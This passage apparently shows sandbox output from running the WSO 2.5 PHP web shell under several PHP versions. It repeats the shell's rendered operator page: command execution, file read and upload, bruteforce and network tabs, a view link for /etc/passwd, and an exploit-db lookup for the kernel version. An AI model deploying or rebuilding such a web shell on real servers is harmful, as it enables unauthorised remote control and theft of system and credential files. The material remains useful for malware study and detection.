20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.16
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.16 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.15
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.15 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.14
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.14 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.13
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.13 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form 